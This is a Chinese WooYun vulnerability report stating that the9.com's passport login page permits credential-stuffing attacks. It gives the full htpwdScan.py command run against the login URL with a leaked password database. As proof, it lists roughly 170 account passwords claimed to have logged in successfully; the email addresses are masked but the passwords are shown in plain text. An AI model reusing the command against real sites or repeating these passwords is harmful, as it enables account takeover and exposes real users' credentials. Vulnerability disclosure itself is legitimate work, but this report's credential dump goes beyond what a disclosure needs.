漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0110115
漏洞标题:第九城市某处可被用于撞库攻击(已验证可登录)
相关厂商:第九城市
漏洞作者: 路人甲
提交时间:2015-04-27 15:39
修复时间:2015-05-02 15:40
公开时间:2015-05-02 15:40
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-27: 细节已通知厂商并且等待厂商处理中
2015-05-02: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
第九城市某处可被用于撞库攻击(验证已登录)
详细说明:
还是借助lijiejie的神器跑了一下
htpwdScan.py -f=C:\Users\Administrator\Desktop\post.txt -https -database loginname,pwd=D:\data\kuzi.txt -regex="([^-]*)----([^-]*)" -err="error" -suc="success" -fip
https://passport.the9.com/index.php
漏洞证明:
一共跑出来了300个账号 这里贴出一部分和登录截图证明
[email protected] 740817
[email protected] zhou0214
[email protected] 19900820
[email protected] feifei
[email protected] jk2001
[email protected] 5200748
[email protected] 211314
[email protected] 12031203
[email protected] 5213344
[email protected] 1985514
[email protected] jfr2233456
[email protected] 1q2w3e4r
[email protected] 198622
[email protected] 666163
[email protected] c89526246
[email protected] 90110598
[email protected] 8411064518
[email protected] 06042210
[email protected] cm19850227
[email protected] 5635616
[email protected] qiangma
[email protected] long1128
[email protected] 19691002
[email protected] 5201573
[email protected] oo7wwh
[email protected] yutao7525339
[email protected] woaini
[email protected] wangxia521
[email protected] yufan117
[email protected] a81288328
[email protected] 123qweasd
[email protected] 198703210
[email protected] 2732392li
[email protected] dengjiwen
[email protected] 6361162
[email protected] 34332202
[email protected] a456456
[email protected] w123456
[email protected] 19820506
[email protected] dundao
[email protected] hdy5201314
[email protected] zhang412
[email protected] demon1983
[email protected] 19881026
[email protected] sunbin945
[email protected] woaini1711
[email protected] 19890520
[email protected] ghm122411
[email protected] 100306
[email protected] s3981627
[email protected] 78254120
[email protected] abcd1988917
[email protected] sxs022573
[email protected] 831024
[email protected] qqwwee88
[email protected] 001026
[email protected] 13770927215
[email protected] wk19871031
[email protected] 1982418
[email protected] baichi123
[email protected] 19801003
[email protected] a85221913
[email protected] as6990105
[email protected] 801105
[email protected] 7758258
[email protected] danziqi0918
[email protected] f19911225
[email protected] 198431
[email protected] ww3333
[email protected] 5752821
[email protected] 19880818
[email protected] 1985110
[email protected] 652301ses
[email protected] qmzqleo123
[email protected] cuiyongjun
[email protected] huang9413
[email protected] 12341234
[email protected] zzq19940
[email protected] liujie2008
[email protected] zjb813627
[email protected] 1215abcd
[email protected] jk11111
[email protected] 19850926x
[email protected] cjj123
[email protected] yu1994hw
[email protected] woaini1
[email protected] 6388808
[email protected] a123456
[email protected] 581859dong
[email protected] 004263
[email protected] liuqian520
[email protected] a123456
[email protected] liuhua028
[email protected] c19820501
[email protected] zaq1zaq1
[email protected] 5262235
[email protected] 3130302
[email protected] fzqkxeqm
[email protected] 5265528aa
[email protected] a123456
[email protected] 123qwe456
[email protected] 1994123
[email protected] dwtmsqcg
[email protected] 7796543
[email protected] wangchao2
[email protected] 19700731
[email protected] 830621
[email protected] 5812332
[email protected] 6300204
[email protected] 6685127
[email protected] 7174119
[email protected] zjane114
[email protected] 530399756
[email protected] 1975409
[email protected] zyd830711
[email protected] swd123
[email protected] 122526
[email protected] yjg8314437
[email protected] ma89400598
[email protected] cwj1314
[email protected] 528718
[email protected] 8330658
[email protected] w5871582
[email protected] fz25923236
[email protected] 741000
[email protected] 7788520
[email protected] 6824226
[email protected] 7891116
[email protected] abc12564
[email protected] 963963a
[email protected] qhcke23
[email protected] 1994730
[email protected] 3213728
[email protected] 19820214
[email protected] 19851112
[email protected] 123466
[email protected] a88426130
[email protected] a19931218
[email protected] zhang5418
[email protected] 19831207
[email protected] 13797478456
[email protected] 5775776
[email protected] qq1234567
[email protected] 1996429
[email protected] 188127
[email protected] 1qaz2wsx
[email protected] 890624
[email protected] c3df32ea
[email protected] 19811222
[email protected] ywppc286
[email protected] 19821018
[email protected] 20010506
[email protected] 007741
[email protected] 8878520
[email protected] a2211211
[email protected] hefei520
[email protected] yangmi5200
[email protected] 1325820142
[email protected] qwe987654321
[email protected] 5234137
[email protected] z1234567
[email protected] 123qwe123
[email protected] aptx4869
修复方案:
加强验证
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-05-02 15:40
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无